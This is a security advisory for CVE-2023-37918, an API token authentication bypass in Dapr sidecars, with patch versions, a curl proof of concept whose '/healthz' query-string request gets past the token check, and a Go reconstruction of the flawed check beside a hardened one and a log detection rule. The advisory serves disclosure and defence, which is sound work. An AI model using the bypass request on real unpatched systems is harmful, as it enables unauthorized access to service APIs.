First published: Fri Jul 21 2023
### Summary

A vulnerability has been found in Dapr that allows bypassing [API token authentication](https://docs.dapr.io/operations/security/api-token/), which the Dapr sidecar uses to authenticate calls coming from the application, with a well-crafted HTTP request. Users who rely on API token authentication are encouraged to upgrade Dapr to 1.10.9 or 1.11.2.

### Impact

This vulnerability impacts Dapr users who have configured API token authentication. An attacker could craft a request that is always allowed by the Dapr sidecar over HTTP, even if the `dapr-api-token` header in the request is invalid or missing.

### Patches

The issue has been fixed in Dapr 1.10.9 and 1.11.2.

### Details

When API token authentication is enabled, Dapr requires all calls from applications to include the `dapr-api-token` header, with a value matching the token in the Dapr configuration. To allow health checks to work, the `/v1.0/healthz` and `/v1.0/healthz/outbound` HTTP APIs are excluded from the API token authentication check and are always allowed.

Dapr <= 1.10.8 and <= 1.11.1 implemented the allowlisting of the health check endpoints by permitting any request whose URL contains `/healthz` to bypass the API token authentication check. The match applied anywhere in the URL, including the query string. As a consequence, attackers were able to bypass API token authentication by including `/healthz` anywhere in the URL, including as a query string parameter. This allowed attackers to invoke any Dapr API over HTTP, including performing service invocation.

### Proof of Concept

The first request carries no token and is rejected; the second presents the configured token and succeeds; the third carries no token but has `/healthz` in the query string, and the unpatched sidecar accepts it.

```
$ curl -v http://localhost:3500/v1.0/metadata
*   Trying ::1:3500...
* Connected to localhost (::1) port 3500 (#0)
> GET /v1.0/metadata HTTP/1.1
> Host: localhost:3500
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 401 Unauthorized
< Date: Mon, 17 Jul 2023 18:13:13 GMT
< Content-Type: text/plain; charset=utf-8
< Content-Length: 17
< Traceparent: 00-00000000000000000000000000000000-0000000000000000-00
<
* Connection #0 to host localhost left intact
invalid api token

$ curl -v http://localhost:3500/v1.0/metadata -H "dapr-api-token: mytoken"
*   Trying ::1:3500...
* Connected to localhost (::1) port 3500 (#0)
> GET /v1.0/metadata HTTP/1.1
> Host: localhost:3500
> User-Agent: curl/7.74.0
> Accept: */*
> dapr-api-token: mytoken
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 17 Jul 2023 18:13:26 GMT
< Content-Type: application/json
< Content-Length: 119
< Traceparent: 00-00000000000000000000000000000000-0000000000000000-00
<
* Connection #0 to host localhost left intact
{"id":"foo","actors":[],"extended":{"daprRuntimeVersion":"v1.11.1"},"components":[],"httpEndpoints":[],"subscriptions":[]}

$ curl -v http://localhost:3500/v1.0/metadata?foo=/healthz
*   Trying ::1:3500...
* Connected to localhost (::1) port 3500 (#0)
> GET /v1.0/metadata?foo=/healthz HTTP/1.1
> Host: localhost:3500
> User-Agent: curl/7.74.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 17 Jul 2023 18:13:44 GMT
< Content-Type: application/json
< Content-Length: 119
< Traceparent: 00-00000000000000000000000000000000-0000000000000000-00
<
* Connection #0 to host localhost left intact
{"id":"foo","actors":[],"extended":{"daprRuntimeVersion":"v1.11.1"},"components":[],"httpEndpoints":[],"subscriptions":[]}
```
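The following Go program is an added example, not Dapr's source code or the project's actual patch. It reconstructs the allowlist behaviour the advisory describes (a substring match for `/healthz` anywhere in the request URI) next to a hardened form that exempts only an exact match on the URL path, runs the three proof-of-concept requests through both, and includes a detection rule that flags logged request URIs carrying `/healthz` outside the real health endpoints. The function names, the `authorize` helper, the configured token `mytoken` and the sample log URIs are all constructed for illustration; the shape of the hardened check is an assumption about what a correct fix looks like, not a description of the upstream commit.

```go
package main

import (
	"crypto/subtle"
	"fmt"
	"net/url"
	"strings"
)

// healthzPaths are the two HTTP endpoints the advisory says are exempt from
// API token authentication so that health checks keep working.
var healthzPaths = map[string]bool{
	"/v1.0/healthz":          true,
	"/v1.0/healthz/outbound": true,
}

// allowedWithoutTokenVulnerable reconstructs the behaviour the advisory
// attributes to Dapr <= 1.10.8 and <= 1.11.1: a substring match for
// "/healthz" anywhere in the request URI, query string included.
// Illustrative reconstruction, not Dapr's source code.
func allowedWithoutTokenVulnerable(requestURI string) bool {
	return strings.Contains(requestURI, "/healthz")
}

// allowedWithoutTokenFixed exempts a request only when its path component
// exactly equals one of the health check endpoints. The query string is
// parsed off before the comparison, so "?foo=/healthz" no longer matches.
// Illustrative hardened form (an assumption), not the project's actual patch.
func allowedWithoutTokenFixed(requestURI string) bool {
	u, err := url.ParseRequestURI(requestURI)
	if err != nil {
		return false // unparseable URI is never exempt; the token check applies
	}
	return healthzPaths[u.Path]
}

// authorize applies the rule from the advisory: allowlisted requests pass
// unconditionally, every other request must carry a dapr-api-token equal to
// the configured token. It returns the HTTP status the sidecar would answer
// with; the comparison is constant-time so timing does not leak partial matches.
func authorize(requestURI, presentedToken, configuredToken string, allowlist func(string) bool) int {
	if allowlist(requestURI) {
		return 200
	}
	if presentedToken == "" ||
		subtle.ConstantTimeCompare([]byte(presentedToken), []byte(configuredToken)) != 1 {
		return 401
	}
	return 200
}

// suspiciousHealthzQuery is a detection rule for access logs of a not yet
// patched sidecar: it flags a request URI whose path is not a real health
// endpoint but still carries "/healthz", literally or percent-encoded in a query value.
func suspiciousHealthzQuery(requestURI string) bool {
	u, err := url.ParseRequestURI(requestURI)
	if err != nil {
		return false
	}
	if healthzPaths[u.Path] {
		return false // a genuine health check, not a bypass attempt
	}
	if strings.Contains(requestURI, "/healthz") {
		return true
	}
	for _, values := range u.Query() {
		for _, v := range values {
			if strings.Contains(v, "/healthz") {
				return true
			}
		}
	}
	return false
}

func main() {
	const configured = "mytoken" // constructed sample token, as in the PoC

	// The three requests from the advisory's proof of concept.
	requests := []struct{ uri, token string }{
		{"/v1.0/metadata", ""},
		{"/v1.0/metadata", "mytoken"},
		{"/v1.0/metadata?foo=/healthz", ""},
	}
	for _, r := range requests {
		fmt.Printf("%-30s token=%-10q vulnerable=%d fixed=%d\n", r.uri, r.token,
			authorize(r.uri, r.token, configured, allowedWithoutTokenVulnerable),
			authorize(r.uri, r.token, configured, allowedWithoutTokenFixed))
	}

	// Constructed request URIs as they might appear in an access log.
	for _, uri := range []string{
		"/v1.0/healthz",
		"/v1.0/metadata?foo=/healthz",
		"/v1.0/invoke/myapp/method/orders?q=%2Fhealthz",
	} {
		fmt.Printf("%-48s suspicious=%v\n", uri, suspiciousHealthzQuery(uri))
	}
}
```

The design point is that an authentication exemption must be keyed on the parsed, normalised path the router actually dispatches on, never on a substring of the raw URI that the caller controls end to end. The detection helper is only useful as a stop-gap while sidecars are being upgraded; once the fix is deployed such requests are simply rejected with 401.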
Credit: security-advisories@github.com
| Affected Software | Affected Version | How to fix |
|---|---|---|
| Linuxfoundation Dapr | <1.10.9 | 1.10.9 |
| Linuxfoundation Dapr | >=1.11.0, <1.11.2 | 1.11.2 |
| go/github.com/dapr/dapr | <1.10.9 | 1.10.9 |
| go/github.com/dapr/dapr | >=1.11.0, <1.11.2 | 1.11.2 |
CVE-2023-37918 is a vulnerability in Dapr that allows attackers to bypass API token authentication.
CVE-2023-37918 has a severity rating of high (7.5).
You can fix CVE-2023-37918 by upgrading to Dapr 1.10.9 or later on the 1.10 branch, or 1.11.2 or later on the 1.11 branch.
You can find more information about CVE-2023-37918 at the following references: [GitHub Advisory](https://github.com/dapr/dapr/security/advisories/GHSA-59m6-82qm-vqgj), [Dapr API Token Authentication](https://docs.dapr.io/operations/security/api-token/), [Dapr Commit](https://github.com/dapr/dapr/commit/83ca1abb11ffe34211db55dcd36d96b94252827a).